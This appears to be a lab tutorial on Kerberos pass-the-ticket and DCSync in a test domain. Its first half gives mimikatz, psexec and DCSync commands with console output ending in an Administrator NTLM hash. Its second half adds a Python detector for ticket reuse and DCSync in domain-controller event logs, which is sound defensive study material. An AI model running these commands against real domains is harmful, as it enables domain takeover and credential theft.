Cached tickets

Cached (exported) tickets can be used from a non-domain machine, but the target must be accessed by its full name in the form ComputerName.domain.local, since the name has to match the service principal the ticket was issued for.
1. On the domain machine, export the usable tickets and copy them to the local (attacker) machine:
   mimikatz privilege::debug "sekurlsa::tickets /export" exit

2. On the attacker machine, import the high-privilege ticket:
   mimikatz privilege::debug "kerberos::ptt C:\Users\jack\Desktop\Administrator@krbtgt-TT.COM.kirbi" exit
   (privilege::debug may fail with c0000061, STATUS_PRIVILEGE_NOT_HELD, when mimikatz is not elevated; kerberos::ptt does not need that privilege and still succeeds, as the output below shows.)

3. Use the ticket to access other domain machines (here 域机器名.域名 stands for ComputerName.domain); mimikatz can also use it to directly sync and export the hash of a specified user via DCSync:
   dir \\域机器名.域名\c$
   psexec \\域机器名.域名 cmd
   mimikatz "lsadump::dcsync /domain:tt.com /user:administrator" exit
C:\Users\jack\Desktop>mimikatz privilege::debug "kerberos::ptt C:\Users\jack\Desktop\Administrator@krbtgt-TT.COM.kirbi" exit

mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz(commandline) # kerberos::ptt C:\Users\jack\Desktop\Administrator@krbtgt-TT.COM.kirbi

* File: 'C:\Users\jack\Desktop\Administrator@krbtgt-TT.COM.kirbi': OK

mimikatz(commandline) # exit
Bye!
C:\Users\jack\Desktop>dir \\WIN-J341S97EGGH.tt.com\c$
 驱动器 \\WIN-J341S97EGGH.tt.com\c$ 中的卷没有标签。
 卷的序列号是 7E13-549E

 \\WIN-J341S97EGGH.tt.com\c$ 的目录

2009/07/14  11:20    <DIR>          PerfLogs
2020/08/28  21:24    <DIR>          Program Files
2020/08/28  21:24    <DIR>          Program Files (x86)
2020/08/28  21:54    <DIR>          Users
2020/08/29  16:14    <DIR>          Windows
               0 个文件              0 字节
               5 个目录 30,553,546,752 可用字节
C:\Users\jack\Desktop>mimikatz "lsadump::dcsync /domain:tt.com /user:administrator" exit

mimikatz(commandline) # lsadump::dcsync /domain:tt.com /user:administrator
[DC] 'tt.com' will be the domain
[DC] 'WIN-J341S97EGGH.tt.com' will be the DC server
[DC] 'administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration   : 1601/1/1 8:00:00
Password last change : 2020/8/28 21:26:05
Object Security ID   : S-1-5-21-1881962959-1052950955-462027270-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 30a96699356033b84283b8918a895d67
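From the domain controller's side, the session above leaves two traces worth alerting on: a service-ticket request (event 4769) from a host that never received a TGT (event 4768) for that user, and a replication request (event 4662 with a DS-Replication-Get-Changes right) from an account that is not a domain controller. The following is an added detection example, not part of the original notes; the event records and IP addresses are constructed, and it assumes the events have already been parsed into dicts with the fields shown.

```python
"""Flag replayed tickets and DCSync in constructed DC security-log records."""
from collections import defaultdict

# Rights GUIDs a DCSync exercises, as logged in the Properties field of event 4662.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}


def find_ticket_reuse(events):
    """Return (user, ip) pairs where a 4769 (TGS request) came from an address
    that never got a 4768 (TGT issued) for that user: the TGT was carried there."""
    tgt_sources = defaultdict(set)
    for e in events:
        if e["id"] == 4768:
            tgt_sources[e["user"].lower()].add(e["ip"])
    return [(e["user"], e["ip"]) for e in events
            if e["id"] == 4769 and e["ip"] not in tgt_sources[e["user"].lower()]]


def find_dcsync(events, dc_accounts):
    """Return accounts that requested directory replication (4662 with a
    replication GUID) but are not domain-controller computer accounts."""
    return [e["user"] for e in events
            if e["id"] == 4662
            and e.get("guid", "").lower() in REPLICATION_GUIDS
            and e["user"].lower() not in dc_accounts]


# Constructed sample: the Administrator TGT is issued to the domain member at
# 10.0.0.5 (where it was exported); it is then used from 10.0.0.99, a host
# outside the domain, to reach cifs on the DC and to pull replication data.
SAMPLE_EVENTS = [
    {"id": 4768, "user": "Administrator", "ip": "10.0.0.5"},
    {"id": 4769, "user": "Administrator", "ip": "10.0.0.5"},
    {"id": 4769, "user": "Administrator", "ip": "10.0.0.99"},
    {"id": 4662, "user": "Administrator",
     "guid": "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"},
    {"id": 4662, "user": "WIN-J341S97EGGH$",  # the DC's own account: legitimate
     "guid": "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"},
]

if __name__ == "__main__":
    print("ticket reuse:", find_ticket_reuse(SAMPLE_EVENTS))
    print("dcsync by non-DC:", find_dcsync(SAMPLE_EVENTS, {"win-j341s97eggh$"}))
```

Real 4769 records also carry the requested service name, so the same check can be narrowed to sensitive services such as cifs and ldap on the domain controllers.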
